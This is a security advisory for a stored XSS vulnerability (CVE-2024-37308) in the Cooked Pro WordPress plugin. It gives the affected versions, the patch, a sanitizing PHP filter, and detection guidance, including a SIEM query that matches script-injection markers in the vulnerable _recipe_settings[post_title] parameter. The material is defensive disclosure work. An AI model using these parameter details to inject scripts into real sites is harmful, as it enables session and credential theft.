CVE-2024-37308
📋 TL;DR
The Cooked Pro WordPress recipe plugin has a stored XSS vulnerability that allows authenticated attackers with contributor-level access or higher to inject malicious scripts into recipe pages. These scripts execute whenever users view compromised pages, potentially stealing credentials or performing unauthorized actions. WordPress sites using Cooked Pro version 1.7.15.4 or earlier are affected.
💻 Affected Systems
- Cooked Pro WordPress Plugin
📦 What is this software?
Cooked by Boxystudio
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, hijack user sessions, deface websites, or redirect users to malicious sites, potentially leading to complete site compromise.
Likely Case
Attackers with contributor access inject malicious scripts to steal user session cookies or credentials, potentially escalating privileges to administrator level.
If Mitigated
With proper input validation and output escaping, the vulnerability is prevented, and only authenticated users with appropriate permissions can modify content.
🎯 Exploit Status
Exploitation requires authenticated access at contributor level or higher. The vulnerability is in a publicly accessible parameter with insufficient sanitization.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.8.0
Vendor Advisory: https://github.com/XjSv/Cooked/security/advisories/GHSA-9vfv-c966-jwrv
Restart Required: No
Instructions:
1. Update Cooked Pro plugin to version 1.8.0 or later via WordPress admin dashboard. 2. Alternatively, apply commit 8cf88f334ccbf11134080bbb655c66f1cfe77026 manually if using development version.
🔧 Temporary Workarounds
Restrict User Roles
allTemporarily restrict contributor-level access or review user permissions to limit who can create/edit recipes.
Input Validation Filter
allAdd custom WordPress filter to sanitize _recipe_settings[post_title] parameter before processing.
add_filter('cooked_recipe_settings', 'sanitize_recipe_title'); function sanitize_recipe_title($settings) { if(isset($settings['post_title'])) { $settings['post_title'] = sanitize_text_field($settings['post_title']); } return $settings; }
🧯 If You Can't Patch
- Disable the Cooked Pro plugin temporarily until patching is possible.
- Implement web application firewall (WAF) rules to block XSS payloads targeting the _recipe_settings[post_title] parameter.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin dashboard > Plugins > Cooked Pro version. If version is 1.7.15.4 or earlier, the site is vulnerable.Check Version:
wp plugin list --name=cooked --field=versionVerify Fix Applied:
After updating, verify Cooked Pro version is 1.8.0 or later in WordPress plugins page. Test recipe creation with script tags in post_title field to confirm sanitization.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to wp-admin/admin-ajax.php with _recipe_settings[post_title] parameter containing script tags or JavaScript code.
- Multiple recipe edits from contributor-level users in short timeframes.
Network Indicators:
- HTTP requests containing malicious script payloads in post_title parameter to WordPress admin endpoints.
SIEM Query:
source="wordpress.log" AND ("_recipe_settings[post_title]" AND ("<script" OR "javascript:" OR "onerror="))